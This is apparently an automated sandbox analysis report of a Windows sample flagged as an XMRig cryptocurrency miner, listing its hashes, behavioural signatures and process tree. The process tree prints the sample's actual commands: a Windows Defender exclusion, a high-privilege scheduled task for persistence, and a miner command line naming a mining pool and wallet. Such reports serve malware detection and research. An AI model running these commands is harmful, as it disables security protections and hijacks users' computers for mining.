Analysis
-
max time kernel
80s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
06/03/2023, 02:55
Static task
static1
Behavioral task
behavioral1
Sample
1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe
Resource
win7-20230220-en
General
-
Target
1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe
-
Size
1.7MB
-
MD5
d85f82eb236129cf1628f10f89f8e6b4
-
SHA1
6325eba8d30318c110cb48c5a1492701b8368821
-
SHA256
1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8
-
SHA512
6864b16893f32b8655a8d67f8a35b9b351a9d7ec39f82b5ed4bf85881d45b7f240aedfe8b9ab8e78aae3854fafc9a0db589168373b913d1cf267872818a1aa91
-
SSDEEP
24576:nrxLARAVB54buvVCT1J0URZsAchJ2/o+td+Gus4eIKuvgLZombBafpwaD+y:nRRB5GSoT020O/oU+GuCr3Lmmbeay
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/memory/364-257-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/364-357-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2024 set thread context of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1992 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 1700 powershell.exe 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 460 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeLockMemoryPrivilege 364 vbc.exe Token: SeLockMemoryPrivilege 364 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 364 vbc.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2024 wrote to memory of 1700 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 26 PID 2024 wrote to memory of 1700 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 26 PID 2024 wrote to memory of 1700 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 26 PID 2024 wrote to memory of 1652 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 28 PID 2024 wrote to memory of 1652 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 28 PID 2024 wrote to memory of 1652 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 28 PID 1652 wrote to memory of 1992 1652 cmd.exe 30 PID 1652 wrote to memory of 1992 1652 cmd.exe 30 PID 1652 wrote to memory of 1992 1652 cmd.exe 30 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 PID 2024 wrote to memory of 364 2024 1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe 32 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe"C:\Users\Admin\AppData\Local\Temp\1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MGPDL" /tr "C:\ProgramData\SonyProduction\MGPDL.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MGPDL" /tr "C:\ProgramData\SonyProduction\MGPDL.exe"3⤵
- Creates scheduled task(s)
PID:1992
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:5555 -u 463n1rdmaG45nXxKYLgq6dJdfpNpjNyFTNWnErGi6VYbdUqRqLXkG3h8R1oDYAorTkf8xo6J6r2r24x8mrq1yEwFHfyM9LR -R --variant=-1 --max-cpu-usage=50 --donate-level=1 -opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:364
-